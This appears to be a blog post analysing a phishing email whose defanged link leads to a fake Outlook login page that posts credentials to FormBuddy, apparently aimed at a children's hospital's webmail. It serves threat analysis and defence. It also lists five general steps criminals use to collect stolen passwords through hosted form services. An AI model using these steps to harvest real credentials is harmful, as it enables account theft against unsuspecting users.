Phishing For Passwords via FormBuddy.com

Most InfoSec professionals have heard of “layer 8” as the unofficial layer of the OSI Model. For those of you that don’t know Layer 8 refers to people. Meaning, no matter how good your security posture there is always that very predictably unpredictable and unpatchable vulnerability known as the user. It is often easier to exploit a person through social engineering than it is to find another attack vector. Take for example this spam email received by some unsuspecting end users:

The email message above looks very basic. It appears to be coming from a reliable source. The subject is “Document” and there is only one sentence in the body, “I sent a document to you, to view it click on the document below.”

For many users this would seem like a normal work email. Even if they didn’t think it was normal they might not assume it’s malicious or a phishing email.

Below you can see the URL when hovering over the “Document” text:

Clicking on that link redirects the user to the following webpage:

Scanning that URL (hxxps://dk-media.s3.amazonaws[.]com/media/1npoq/downloads/311511/share.html) via VirusTotal shows a detection ratio of 4/68 (as of 8/18/16) for “malicious” and “phishing” site. The link to that VirusTotal report can be found HERE.

Below is a snapshot of the source code showing a URL for hxxp://www.formbuddy[.]com/cgi-bin/form.pl, a method of “POST”, input values for “username” (rifart45f is the account name on FormBuddy.com), as well as a URL pointing to what appears to be a legitimate sub-domain (webmail.luriechildrens[.]org):

Using some fake credentials I attempted to “Sign In” and was redirected to the URL shown in the source code (hxxp://www.formbuddy[.]com/cgi-bin/form.pl). Again, this was a Web login page for an Outlook account.

The phishing site would appear to be targeting the legitimate web portal located at “hxxps://webmail.luriechildrens.org”. Luriechildrens.org is a site for the Ann & Robert H. Lurie Children’s Hospital in Chicago.

Scanning hxxp://www.formbuddy[.]com/cgi-bin/form.pl via VirusTotal shows a detection ratio of 3/68 for “malicious” and “phishing” site (as of 8/18/16). The link to that VirusTotal report can be found HERE.

Predictably I was able to capture my fake credentials via POST request being sent in the clear:

Trying to submit another set of credentials on hxxp://www.formbuddy[.]com/cgi-bin/form.pl doesn’t seem to do anything. I’m not finding any POST request or GET request and clicking the Sign In button doesn’t even return an error with my fake credentials.

Doing some research I found that hackers use FormBuddy as a means to steal victims passwords. Essentially FormBuddy allows anyone to have a remotely hosted form processor for their website. Here are the steps criminals use to steal passwords from their victims:

Step 1: Select a hosting form service like FormBuddy
Step 2: Create a fake login page used to grab user credentials
Step 3: Host the login page
Step 4: Send phishing emails pointing to your newly created fake login page.
Step 5: Stolen credentials are emailed to your FormBuddy account

Flagging traffic from FormBuddy might be the best solution for this type of phishing attack. 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: